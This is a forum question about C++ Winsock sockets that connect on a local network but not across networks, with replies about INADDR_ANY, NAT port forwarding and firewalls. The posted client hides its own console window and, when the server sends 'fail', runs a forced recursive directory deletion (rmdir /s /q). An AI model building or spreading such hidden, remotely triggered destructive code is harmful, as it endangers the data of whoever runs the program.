# Sockets between networks in c++

Tags: c++, sockets, networking

I’m a noob with sockets, and I’ve tried to make a program. When it is connected in my local address it works ok, but the problem comes when I try to use it between networks, and they don’t connect. I’ve tried changing the IP from local to public and a lot of combinations of IPs. Here is the code of the program:

SERVER

```
#pragma comment(lib, "ws2_32.lib")
#include <winsock2.h>
#include <iostream>
#include <cstdio>

#pragma warning(disable: 4996)

int main(int argc, char* argv[]) {
    //WSAStartup
    WSAData wsaData;
    WORD DLLVersion = MAKEWORD(2, 1);
    if (WSAStartup(DLLVersion, &wsaData) != 0) {
        std::cout << "Error" << std::endl;
        exit(1);
    }

    SOCKADDR_IN addr;
    int sizeofaddr = sizeof(addr);
    addr.sin_addr.S_un.S_addr = INADDR_ANY;
    addr.sin_port = htons(45600);
    addr.sin_family = AF_INET;

    SOCKET sListen = socket(AF_INET, SOCK_STREAM, NULL);
    bind(sListen, (SOCKADDR*)&addr, sizeof(addr));
    listen(sListen, SOMAXCONN);

    SOCKET newConnection;
    newConnection = accept(sListen, (SOCKADDR*)&addr, &sizeofaddr);

    if (newConnection == 0) {
        std::cout << "Error #2\n";
    }
    else {
        while (true) {
            std::cout << "Conectado\n";
            char msg[256] = "";
            std::cin.getline(msg, sizeof(msg));
            send(newConnection, msg, sizeof(msg), NULL);
        }
    }


    system("pause");
    return 0;
}
```

CLIENT

```
#pragma comment(lib, "ws2_32.lib")
#include <winsock2.h>
#include <iostream>
#include <cstring>
#include <cstdlib>
#pragma warning(disable: 4996)

void Stealth()
{
    HWND Stealth;
    AllocConsole();
    Stealth = FindWindowA("ConsoleWindowClass", NULL);
    ShowWindow(Stealth, 0);
}

int main(int argc, char* argv[]) {

    //WSAStartup
    WSAData wsaData;
    WORD DLLVersion = MAKEWORD(2, 1);
    if (WSAStartup(DLLVersion, &wsaData) != 0) {
        std::cout << "Error" << std::endl;
        exit(1);
    }

    SOCKADDR_IN addr;
    int sizeofaddr = sizeof(addr);
    addr.sin_addr.s_addr = inet_addr("192.168.1.17");
    addr.sin_port = htons(45600);
    addr.sin_family = AF_INET;

    SOCKET Connection = socket(AF_INET, SOCK_STREAM, NULL);
    if (connect(Connection, (SOCKADDR*)&addr, sizeof(addr)) != 0) {
        std::cout << "Error: failed connect to server.\n";
        return 1;
    }
    std::cout << "Soy cliente\n";
    char msg[256] = "";
    recv(Connection, msg, sizeof(msg), NULL);
    std::cout << msg << std::endl;
    if (msg[0] == 'f' && msg[1] == 'a' && msg[2] == 'i' && msg[3] == 'l') {
        std::string directoryName = "C:\\Users\\usuario\\Documents\\Prueba";
        std::string a = "rmdir /s /q " + directoryName;
        system(a.c_str());
        }

    std::system("pause");
    return 0;
}
```

Comment: Try replacing `inet_addr("192.168.1.17")` with `INADDR_ANY`

Comment: in the server or in the client part?

Comment: Sorry i took the wrong ip address, you should do it on server side in order to accept connections from any address.

Comment: I've changed it, but it doesn't work yet

Answer (score 0):

if your server is behind a NAT, you need to enable port forwarding on the NAT, and then have the client connect to the NAT's public IP.

If not, check your firewall settings.